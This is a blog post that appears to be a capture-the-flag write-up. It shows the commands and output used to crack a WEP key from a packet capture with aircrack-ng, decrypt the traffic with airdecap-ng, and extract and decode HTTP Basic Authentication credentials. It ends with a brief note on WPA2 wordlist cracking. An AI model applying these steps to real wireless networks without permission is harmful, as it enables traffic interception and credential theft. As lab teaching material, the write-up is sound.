Recently in a capture the flag event I had to utilize aircrack-ng to break the WEP key on a packet capture, then airdecap-ng to decrypt the contents of the WEP packets and export them to another packet capture, use tshark to output to text and then use a grep regular expression to extract base64 Authentication Basic username and passwords.
Below are the commands that I ran to accomplish this:
# aircrack-ng WIRELESS-C2.cap
Opening WIRELESS-C2.cap
Read 73650 packets.
# BSSID ESSID Encryption
1 00:40:10:20:00:03 Wireless Challenge Two WEP (25704 IVs)
Choosing first network as target.
Opening WIRELESS-C2.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 25704 ivs.
Aircrack-ng 1.2 beta1
[00:00:00] Tested 397 keys (got 25082 IVs)
KB depth byte(vote)
0 2/ 4 DA(31232) C0(30976) 22(30720) E8(30720) 16(30208) 25(30208) D0(30208)
1 0/ 1 1C(35840) 03(32256) 7F(32000) B7(32000) F2(30464) 95(30208) 86(29952)
2 0/ 5 91(34048) CC(33792) 2D(32512) 58(31232) 84(31232) 2F(30720) 3D(30720)
3 5/ 26 0A(30208) 39(30208) 5B(30208) 62(29952) ED(29696) 02(29696) 2E(29696)
4 0/ 1 C4(35072) 19(31744) 31(30464) CD(30208) 10(29696) 6E(29696) D5(29696)
KEY FOUND! [ C0:1C:91:0A:C4 ]
Decrypted correctly: 100%
# airdecap-ng -w c01c910ac4 WIRELESS-C2.cap
## Open up in Wireshark the WIRELESS-C2-dec.cap
## Add filter for (http.request.method == "GET") || (http.request.method == "POST")
## After the filter is applied find the management.asp page
## Right-click and follow TCP stream
## In the open window you find the "Authorization: Basic cm9vdDphZG1pbg=="
## The base64 encoding is the admin username and password
## Decoded the username and password is root:admin
## OR you can use tshark and export the packet information to a file
# tshark -V -r WIRELESS-C2-dec.cap > WIRELESS-dec.txt
## Then wrote a short and sweet regex to extract base64 encoded strings
# cat WIRELESS-C2-dec.txt | grep '\+*[A-Za-z0-9]\{11,\}\+=' # Find base64 encoded text that is 11 characters or longer
## Walla! Authorization: Basic cm9vdDphZG1pbg==\r\n
## Then you can decode it from the command line by doing the following
echo "cm9vdDphZG1pbg==" | base64 -d
# Note on WPA2 packet captures
#aircrack-ng <file>.cap -w Wordlist.txt - This is to find the password used
# Then to decrypt the packet capture
# airdecap-ng <file>.pcap -e <SSID> -p <password>
Subscribe to:
Post Comments (Atom)
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist... -
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them... -
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th... -
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
-
Recently I was doing some scanning with a tool that is available on github called masscan. The tool allows you to configure a configuration...
No comments:
Post a Comment